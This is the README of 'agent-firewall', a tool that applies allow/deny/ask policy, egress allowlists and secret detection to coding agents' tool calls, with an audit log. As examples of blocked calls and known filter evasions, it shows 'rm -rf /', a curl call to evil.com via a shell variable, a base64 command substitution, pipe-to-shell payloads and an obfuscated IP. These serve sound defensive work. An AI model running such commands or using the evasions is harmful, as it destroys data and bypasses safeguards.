A dry-run firewall for coding agents.
Coding agents (Claude Code, MCP servers, autonomous tool-callers) execute
real-world side effects: they write files, run shell commands, and make HTTP
requests. agent-firewall sits in front of those calls. Before a tool call
touches the real world it:
- Summarizes the side effect: a unified diff for file writes, the exact command for shell, method + URL + body for HTTP.
- Applies an allow / deny / ask policy: ordered rules matched on tool name and arg patterns (glob / regex / substring), first-match-wins.
- Audits the decision: every call is appended to a replayable SQLite log.
It is intentionally small, dependency-light, and thoroughly tested (147 tests, including a live end-to-end MCP-proxy test that spawns a real downstream server).
tool call ──▶ [ policy engine ] ──▶ allow / deny / ask
                 │                              │
                 ├─▶ [ summarizer ]             └─▶ (ask) interactive hold
                 │    (diff / cmd / http)           a/d/persist-rule
                 └─▶ [ audit log ]  (sqlite, queryable)
Two ways to put it in front of an agent:
- Claude Code PreToolUse hook: gates every Claude Code tool call.
- MCP stdio proxy: sits in front of any MCP server and gates tools/call.
See it stop a destructive call. No setup, this is the real check output:
$ echo '{"tool":"Bash","args":{"command":"rm -rf /"}}' > call.json
$ agent-firewall check call.json
● DENY block rm -rf on absolute roots
Shell command
rm -rf /

npm install # from a clone
# or, once published:
# npm install -g github:Martello-Systems/agent-firewall

The package is published under the scoped name agent-firewall;
the installed command is still agent-firewall (usage below is unchanged).
Requires Node 18+. ESM-only.
agent-firewall hook reads a Claude Code PreToolUse event on stdin and
prints the permission decision JSON Claude Code expects on stdout. Add it to
your Claude Code settings (~/.claude/settings.json or a project
.claude/settings.json):
{
"hooks": {
"PreToolUse": [
{
"matcher": "*",
"hooks": [
{
"type": "command",
"command": "node /absolute/path/to/agent-firewall/bin/agent-firewall.js --config /absolute/path/to/firewall.config.json hook"
}
]
}
]
}
}

The hook emits, for example:
{
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "deny",
"permissionDecisionReason": "[agent-firewall] DENY: block rm -rf on absolute roots"
}
}

Verified against the official Claude Code hooks docs (https://code.claude.com/docs/en/hooks.md, confirmed 2026-06-23):
- stdin: Claude Code writes a JSON event: { session_id, transcript_path, cwd, permission_mode, hook_event_name: "PreToolUse", tool_name, tool_input }.
- stdout (exit 0): for PreToolUse the decision lives under hookSpecificOutput (camelCase), not a top-level decision field: permissionDecision ∈ allow | deny | ask, with permissionDecisionReason (required when the decision is deny).
- Exit codes: on exit 0 the stdout JSON is honored; on exit 2 the JSON is ignored and stderr is fed back as a blocking error. We therefore always exit 0 and express the decision purely via permissionDecision.
permissionDecision is mapped directly from your policy. On unparseable input
the hook falls back to ask, so a malformed event never hard-crashes the agent.
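The mapping from a stdin event to the stdout decision can be sketched as below. This is a minimal illustration, not the code in src/hook-adapter.js: the function names toHookOutput and handleHookInput, the decide callback, and the fallback reason text are all assumptions made for the example. Only the JSON field names come from the hook contract described above.

```javascript
// Build the stdout JSON for a PreToolUse decision.
// The "[agent-firewall] DENY: ..." reason format mirrors the example output above.
function toHookOutput(decision, reason) {
  return {
    hookSpecificOutput: {
      hookEventName: 'PreToolUse',
      permissionDecision: decision,
      permissionDecisionReason: `[agent-firewall] ${decision.toUpperCase()}: ${reason}`,
    },
  };
}

// Hypothetical adapter: parse the raw stdin payload, hand the tool call to a
// policy callback, and fall back to "ask" when the payload cannot be parsed.
function handleHookInput(rawStdin, decide) {
  let event;
  try {
    event = JSON.parse(rawStdin);
  } catch {
    return toHookOutput('ask', 'unparseable hook input');
  }
  if (event === null || typeof event !== 'object') {
    return toHookOutput('ask', 'unparseable hook input');
  }
  // decide() is assumed to return { action, reason } for a { tool, args } call.
  const { action, reason } = decide({ tool: event.tool_name, args: event.tool_input });
  return toHookOutput(action, reason);
}
```

A real hook would write JSON.stringify of the result to stdout and exit 0 in every case, since the decision is carried entirely by permissionDecision.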
agent-firewall mcp -- <server> [args...] spawns a downstream MCP server and
proxies the newline-delimited JSON-RPC stdio stream between your MCP client and
that server. Every message is forwarded verbatim except tools/call
requests, which run through the same policy engine:
- allow → forwarded to the server, which executes it normally.
- deny → blocked at the proxy; the client gets a JSON-RPC error (code -32001) and the server never sees the call.
- ask → held; by default denied back to the client (--allow-holds lets held calls through instead).
# Instead of pointing your MCP client at: node ./my-mcp-server.js
# point it at:
agent-firewall mcp -- node ./my-mcp-server.js

Frame boundaries are handled correctly: messages split across stream chunks are reassembled, multiple messages per chunk are split, and non-JSON lines pass through untouched so the protocol stream is never corrupted.
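The framing and gating behavior described above can be sketched roughly as follows. The LineFramer class, the routeLine function, the decide callback, and the error message text are hypothetical names chosen for this illustration, and the sketch assumes chunks arrive as already-decoded strings. The tools/call params shape (name, arguments) and the -32001 code are the only parts taken from the protocol and the text above.

```javascript
// Accumulates stream chunks and emits only complete newline-delimited lines.
// Assumes string chunks (e.g. after stream.setEncoding('utf8')).
class LineFramer {
  constructor() {
    this.buffer = '';
  }
  push(chunk) {
    this.buffer += chunk;
    const lines = this.buffer.split('\n');
    this.buffer = lines.pop(); // keep the trailing partial line (possibly '')
    return lines;
  }
}

// Decide what to do with one line from the client:
//   { forward: line } -> pass it to the downstream server unchanged
//   { reply: json }   -> answer the client directly, server never sees it
function routeLine(line, decide) {
  let msg;
  try {
    msg = JSON.parse(line);
  } catch {
    return { forward: line }; // non-JSON lines pass through untouched
  }
  if (msg === null || typeof msg !== 'object' || msg.method !== 'tools/call') {
    return { forward: line };
  }
  const action = decide(msg.params?.name, msg.params?.arguments ?? {});
  if (action === 'allow') return { forward: line };
  // "deny", and "ask" without --allow-holds, are both answered with an error.
  return {
    reply: JSON.stringify({
      jsonrpc: '2.0',
      id: msg.id,
      error: { code: -32001, message: 'blocked by agent-firewall' },
    }),
  };
}
```

Forwarding the original line rather than a re-serialized object is what keeps allowed traffic byte-for-byte verbatim.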
The firewall looks for firewall.config.json in the working directory (override
with --config <path> or the AGENT_FIREWALL_CONFIG env var). If none is found
a safe built-in default is used (read-only tools allowed; rm -rf / and .env
writes denied; everything else ask).
{
"policy": {
"default": "ask",
"rules": [
{
"action": "allow",
"tool": ["Read", "Glob", "Grep", "LS"],
"description": "read-only tools are always allowed"
},
{
"action": "deny",
"tool": "Bash",
"match": { "command": "regex:rm\\s+-rf\\s+/" },
"description": "block rm -rf on absolute roots"
},
{
"action": "deny",
"tool": ["Write", "Edit", "MultiEdit"],
"match": { "file_path": "glob:**/.env" },
"description": "never write to .env files"
},
{
"action": "ask",
"tool": ["Write", "Edit", "MultiEdit"],
"description": "review all other file writes"
}
]
},
"audit": { "db": ".agent-firewall/audit.sqlite" }
}

- Ordered, first-match-wins. Put specific denies above broad allows.
- action (required): allow | deny | ask.
- tool (optional): a name, an array of names, or "*" (default). Case-insensitive.
- match (optional): an object of argPath → matcher. All entries must match. Arg paths support dotted access ("options.danger").
- default (optional, top-level): the action when no rule matches. Defaults to ask.
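To make the ordering semantics concrete, here is a minimal sketch of first-match-wins evaluation. It is not the code in src/policy.js: the helper names (getPath, substringMatch, toolMatches, evaluate) are hypothetical, only the bare-string (substring) matcher is implemented to keep it short, and returning ruleIndex -1 for the default case is an assumption of this example.

```javascript
// Hypothetical helper: resolve a dotted arg path such as "options.danger".
function getPath(obj, path) {
  return path.split('.').reduce((v, key) => (v == null ? undefined : v[key]), obj);
}

// Simplified matcher: only the bare-string form (case-insensitive substring).
function substringMatch(value, needle) {
  return String(value ?? '').toLowerCase().includes(String(needle).toLowerCase());
}

// A rule's tool may be omitted, "*", a single name, or an array of names.
function toolMatches(ruleTool, toolName) {
  if (ruleTool === undefined || ruleTool === '*') return true;
  const names = Array.isArray(ruleTool) ? ruleTool : [ruleTool];
  return names.some((n) => n.toLowerCase() === toolName.toLowerCase());
}

// Walk the rules in order and return the first one that matches;
// fall back to the policy default ("ask" if unset) when none does.
function evaluate(policy, call) {
  const rules = policy.rules ?? [];
  for (let i = 0; i < rules.length; i++) {
    const rule = rules[i];
    if (!toolMatches(rule.tool, call.tool)) continue;
    const entries = Object.entries(rule.match ?? {});
    const allMatch = entries.every(([path, needle]) =>
      substringMatch(getPath(call.args, path), needle));
    if (allMatch) return { action: rule.action, ruleIndex: i };
  }
  return { action: policy.default ?? 'ask', ruleIndex: -1 };
}
```

Because evaluation stops at the first hit, a broad allow placed above a specific deny would shadow it, which is why specific denies belong first.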
| Form | Meaning |
|---|---|
| "glob:**/.env" | glob against the stringified arg value (* stays within a path segment, ** crosses them) |
| "regex:rm\\s+-rf" | regular expression, case-insensitive by default |
| "equals:exact" | strict equality |
| "sudo" (bare string) | case-insensitive substring containment |
| { "glob": "..." } / { "regex": "...", "flags": "i" } / { "equals": "..." } / { "contains": "..." } | explicit object forms |
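One way the matcher forms in this table could be compiled into predicates is sketched below. The function names globToRegExp and compileMatcher are hypothetical, and two details are assumptions rather than documented behavior: that a leading "**/" may match zero path segments, and that string prefixes are normalized into the object form before compiling.

```javascript
// Convert a glob to a RegExp: "*" stays within a path segment, "**" crosses them.
function globToRegExp(glob) {
  let out = '';
  for (let i = 0; i < glob.length; i++) {
    const ch = glob[i];
    if (ch !== '*') {
      out += ch.replace(/[.+?^${}()|[\]\\]/g, '\\$&'); // escape regex metacharacters
    } else if (glob[i + 1] === '*') {
      i++;
      if (glob[i + 1] === '/') {
        i++;
        out += '(?:.*/)?'; // assumption: "**/" may also match zero segments
      } else {
        out += '.*';
      }
    } else {
      out += '[^/]*';
    }
  }
  return new RegExp('^' + out + '$');
}

// Turn any matcher form from the table into a predicate over an arg value.
function compileMatcher(spec) {
  if (typeof spec === 'string') {
    const m = /^(glob|regex|equals):(.*)$/s.exec(spec);
    spec = m ? { [m[1]]: m[2] } : { contains: spec }; // bare string = substring
  }
  if ('glob' in spec) {
    const re = globToRegExp(spec.glob);
    return (v) => re.test(String(v));
  }
  if ('regex' in spec) {
    const re = new RegExp(spec.regex, spec.flags ?? 'i'); // case-insensitive by default
    return (v) => re.test(String(v));
  }
  if ('equals' in spec) return (v) => v === spec.equals;
  if ('contains' in spec) {
    const needle = spec.contains.toLowerCase();
    return (v) => String(v).toLowerCase().includes(needle);
  }
  throw new Error('unknown matcher form');
}
```

Compiling each matcher once and reusing the predicate avoids rebuilding a RegExp on every tool call.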
Tool-level permissions can gate which tool runs, but not where an allowed
tool reaches on the network. Add an optional egress block to your policy to
allowlist outbound HTTP(S) destinations. Any WebFetch/fetch/http call to a
host that is not on the list is denied (or held for ask), through the same
decision + audit seam as everything else. The allowlist is also applied to
shell commands: destination hosts pulled out of curl/wget/nc/ssh/scp
(any bare scheme://host URL, plus bare hostnames, IPv4 literals like
1.2.3.4, and bracketed IPv6 literals passed to those tools) are held to the
same list, so a shell call can't quietly bypass it:
{
"policy": {
"egress": {
"allow": ["api.github.com", "*.openai.com", ".internal.example.com"],
"action": "deny"
},
"rules": [ ... ]
}
}

- allow: a list of hosts. Entries may be an exact host (api.github.com), a glob (*.openai.com), a leading-dot suffix that also matches the apex (.example.com matches example.com and any subdomain), or * (allow all).
- action (optional): deny (default) or ask for a non-allowlisted host.
- A request whose host cannot be parsed is treated as a violation.
- The block is opt-in: with no egress key, network calls are governed by your normal rules only.
- Shell coverage is best-effort. Hosts are extracted from the command string by a static scan: explicit scheme://host URLs anywhere; bare hostnames, IPv4 literals (1.2.3.4), and bracketed IPv6 ([2001:db8::1]) passed to a recognized network tool; obfuscated decimal/hex/octal IP literals (curl 2130706433), which are decoded to their canonical address; and destinations stashed in literal shell variables (U=https://evil.com; curl $U), which are expanded before extraction. Two evasions remain inherent to static analysis, because deciding them would require actually executing the command, which a dry-run filter must not do:
  - Command substitution: a host computed at runtime, e.g. curl $(echo ZXZpbC5jb20= | base64 -d).
  - Pipe-to-shell: an obfuscated payload decoded and piped into a shell, e.g. echo <base64> | base64 -d | sh.

  For these, treat shell egress as a backstop and pair it with OS-level network controls (or run the agent in a sandbox) for untrusted workloads.
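The allowlist rules above (exact host, glob, leading-dot suffix, and *) can be illustrated with a small host check. This is a sketch under assumptions, not the logic in src/egress-guard.js: the names escapeRe, hostAllowed, and checkUrl are hypothetical, it only covers full URLs (not shell extraction), and it assumes a * in a host glob may span more than one DNS label.

```javascript
// Escape regex metacharacters in a literal string.
function escapeRe(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// True when the host matches at least one allowlist entry.
function hostAllowed(host, allow) {
  const h = host.toLowerCase();
  return allow.some((entry) => {
    const e = entry.toLowerCase();
    if (e === '*') return true;                        // allow all
    if (e.startsWith('.')) {
      return h === e.slice(1) || h.endsWith(e);        // apex or any subdomain
    }
    if (e.includes('*')) {
      // Assumption: "*" may span several labels (a.b.openai.com).
      const re = new RegExp('^' + e.split('*').map(escapeRe).join('.*') + '$');
      return re.test(h);
    }
    return h === e;                                    // exact host
  });
}

// Returns "allow", or the configured action ("deny" by default) for a
// non-allowlisted or unparseable destination.
function checkUrl(url, egress) {
  const violation = egress.action ?? 'deny';
  let host;
  try {
    host = new URL(url).hostname;
  } catch {
    return violation; // a host that cannot be parsed is treated as a violation
  }
  return hostAllowed(host, egress.allow) ? 'allow' : violation;
}
```

Note that the leading-dot form checks for the dot itself, so .internal.example.com does not match notinternal.example.com.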
# Claude Code PreToolUse hook (stdin event JSON -> stdout decision JSON)
agent-firewall hook
# Evaluate a single tool call against the policy (dry run)
agent-firewall check call.json # human-readable + diff
agent-firewall check call.json --json # machine-readable decision
agent-firewall check call.json --interactive # on 'ask', prompt a/d/persist
# call.json may be {"tool":"Write","args":{...}} OR a PreToolUse event
# exit code: 0 = allow, 1 = ask, 2 = deny
# Inspect the audit log (most recent first)
agent-firewall log
agent-firewall log -n 50 --decision deny --tool Bash
agent-firewall log --json
# MCP stdio proxy in front of any MCP server
agent-firewall mcp -- node ./some-mcp-server.js
agent-firewall mcp --allow-holds -- node ./some-mcp-server.js

When a decision is ask, --interactive holds the call, prints the side-effect
summary, and waits for a single keypress:
● ASK no rule matched, default action "ask"
File write: /proj/server.js
--- /proj/server.js current
+++ /proj/server.js proposed
@@ ... @@
+app.listen(3000)
[a]llow once [d]eny [p]ersist allow rule ?
- a/y: allow this one call.
- d/n: deny it.
- p: allow it and persist a narrow allow rule (scoped to the exact tool + command/file/url) to the top of your firewall.config.json, so the same call is auto-allowed next time.
The interactive layer takes injectable prompt/render IO, so it's fully unit tested without a TTY.
$ echo '{"tool":"Write","args":{"file_path":"/proj/.env","content":"API_KEY=__placeholder__"}}' > call.json
$ agent-firewall check call.json
● DENY never write to .env files
File write: /proj/.env
--- /proj/.env (new file) (absent)
+++ /proj/.env (new file) proposed
@@ -0,0 +1,1 @@
+API_KEY=__placeholder__

Every decision (from the hook, the proxy, or check) is appended to a SQLite
log you can query later:
$ agent-firewall log
2026-06-23T09:32:36.665Z ASK Write File write: /p/x.js
2026-06-23T09:32:36.573Z DENY Bash Shell command
2026-06-23T09:32:36.465Z ALLOW Read Tool call: Read
3 of 3 record(s)
$ agent-firewall log --json --decision deny
[
{
"id": 2,
"ts": "2026-06-23T09:32:36.573Z",
"source": "check",
"tool": "Bash",
"decision": "deny",
"kind": "shell",
"summary": "Shell command\nrm -rf /",
"reason": "block rm -rf on absolute roots",
"ruleIndex": 1,
"args": { "command": "rm -rf /" }
}
]

The log is backed by better-sqlite3 with parameterized queries throughout
(no string-interpolated SQL), so a tool name or filter value can never inject.
Stored args are redacted before they hit disk: provider key prefixes,
Authorization: Bearer/Basic tokens, secret-named assignments,
scheme://user:pass@host URL passwords, and secret-bearing URL query params are
replaced with [REDACTED], so a token embedded in a shell command or URL is
never persisted to the audit DB verbatim.
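The kind of redaction pass described here can be sketched as a list of pattern/replacement pairs applied recursively to the args before they are stored. The names REDACTIONS, redactString, and redactArgs are hypothetical, the patterns cover only three of the listed categories, and the query-parameter name list is an assumption made for the example rather than the tool's actual list.

```javascript
// Pattern/replacement pairs. Each keeps the non-secret prefix ($1) and
// replaces only the secret portion with [REDACTED].
const REDACTIONS = [
  // Authorization: Bearer <token> / Authorization: Basic <token>
  [/(\bAuthorization:\s*(?:Bearer|Basic)\s+)[^\s'"]+/gi, '$1[REDACTED]'],
  // scheme://user:pass@host -> keep the user, drop the password
  [/(\b[a-z][a-z0-9+.-]*:\/\/[^\s:/@]+:)[^\s@/]+(?=@)/gi, '$1[REDACTED]'],
  // secret-bearing URL query params (hypothetical name list)
  [/([?&](?:token|api_key|access_token|secret|password)=)[^&\s'"]+/gi, '$1[REDACTED]'],
];

function redactString(s) {
  return REDACTIONS.reduce((acc, [re, replacement]) => acc.replace(re, replacement), s);
}

// Walk strings, arrays, and plain objects; leave other values untouched.
function redactArgs(value) {
  if (typeof value === 'string') return redactString(value);
  if (Array.isArray(value)) return value.map(redactArgs);
  if (value && typeof value === 'object') {
    return Object.fromEntries(
      Object.entries(value).map(([k, v]) => [k, redactArgs(v)]));
  }
  return value;
}
```

Running the pass on a copy of the args before the insert means the policy engine still sees the original values, while the database only ever receives the redacted form.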
| Module | Responsibility | Tested |
|---|---|---|
| src/policy.js | rule evaluation, glob/regex/equals/contains matching, ordering, defaults | ✅ |
| src/summarize.js | side-effect summaries (file diff / shell / http / generic) | ✅ |
| src/audit.js | append + query the SQLite audit log | ✅ |
| src/hook-adapter.js | Claude Code PreToolUse event ⇄ decision JSON mapping | ✅ |
| src/mcp-proxy.js | MCP tools/call interception + live stdio proxy + framing | ✅ (incl. e2e) |
| src/interactive.js | interactive ask hold (allow / deny / persist-rule) | ✅ |
| src/secret-guard.js | block writes that commit literal secrets (overrides policy) | ✅ |
| src/egress-guard.js | gate outbound HTTP(S) destinations against an allowlist | ✅ |
| src/engine.js | shared seam: secret-guard + egress-guard + policy + summarize + audit per call | ✅ (direct + via adapters) |
| src/config.js | load + validate firewall.config.json; persist rules | ✅ |
| bin/agent-firewall.js | CLI | ✅ (spawned integration tests) |
Run the suite and lint:
npm test # node --test, 147 tests, incl. a live MCP-proxy e2e
npm run lint # eslint, zero warnings

agent-firewall is a safety net, not a sandbox. Read these before trusting
it in front of an autonomous agent:
- It only sees the calls it's wired in front of. A code path that bypasses the hook/proxy (e.g. a tool the proxy doesn't gate, or a shell subprocess that spawns its own children) is not intercepted. Pair it with OS-level sandboxing for untrusted workloads.
- The MCP proxy gates tools/call only; all other JSON-RPC traffic is forwarded verbatim by design.
- Over stdio there is no interactive prompt for an MCP ask: held calls are denied by default (or let through with --allow-holds). The interactive allow/deny/persist flow is available via agent-firewall check -i and the Claude Code hook's native ask dialog.
- Side-effect summaries are best-effort: file diffs are computed by reading the current file from disk (a dry run), and the summarizer recognizes common tool shapes but won't deep-parse every conceivable arg layout.
- Secret detection is heuristic (known key prefixes + secret-named assignments to non-placeholder values); it is a backstop, not a guarantee.
A built-in secret guard (src/secret-guard.js) runs ahead of your policy on
every path (Claude Code hook, MCP proxy, and check CLI alike, because it lives
in the shared src/engine.js seam): any Write/Edit that would commit a
literal credential
(provider key prefixes, *_live_* keys, private-key blocks, JWTs, or a
secret-named assignment to a non-placeholder value) is denied unconditionally,
and the denial reason never echoes the secret. Env refs (${VAR}),
<placeholders>, and changeme-style values are allowed through. Never commit
real secrets to firewall.config.json or your tool-call fixtures: use
placeholders and env vars.
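The "secret-named assignment to a non-placeholder value" heuristic can be illustrated with a short sketch. It is deliberately narrower than what the paragraph above describes (no key prefixes, private-key blocks, or JWTs), and the names ASSIGNMENT, isPlaceholder, findSecretAssignments, and guardWrite, the list of secret-like name fragments, and the "pass" result are all assumptions made for this example.

```javascript
// NAME = value or NAME: value, where NAME contains a secret-like fragment.
// The fragment list is a hypothetical stand-in for the real heuristics.
const ASSIGNMENT =
  /\b([A-Z0-9_]*(?:SECRET|TOKEN|PASSWORD|API_KEY)[A-Z0-9_]*)\s*[:=]\s*["']?([^\s"']+)/gi;

// Values that are allowed through.
function isPlaceholder(value) {
  return /^\$\{[^}]+\}$/.test(value) // env ref: ${VAR}
    || /^<[^>]+>$/.test(value)       // <placeholder>
    || /^changeme$/i.test(value);    // changeme-style value
}

// Returns only the names of offending assignments, never their values.
function findSecretAssignments(content) {
  const names = [];
  for (const m of content.matchAll(ASSIGNMENT)) {
    if (!isPlaceholder(m[2])) names.push(m[1]);
  }
  return names;
}

// Hypothetical guard: "deny" overrides policy, "pass" defers to it.
function guardWrite(content) {
  const names = findSecretAssignments(content);
  if (names.length === 0) return { action: 'pass' };
  // The reason names the variable but never echoes the secret itself.
  return { action: 'deny', reason: `literal secret assigned to ${names.join(', ')}` };
}
```

Collecting variable names instead of matched values is what keeps the denial reason, and therefore the audit log, free of the secret.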
Apache-2.0 © 2026 Martello Systems. See LICENSE.
Built by Martello Systems. We design and ship AI-driven software. Part of the Martello open-source dev-tools family.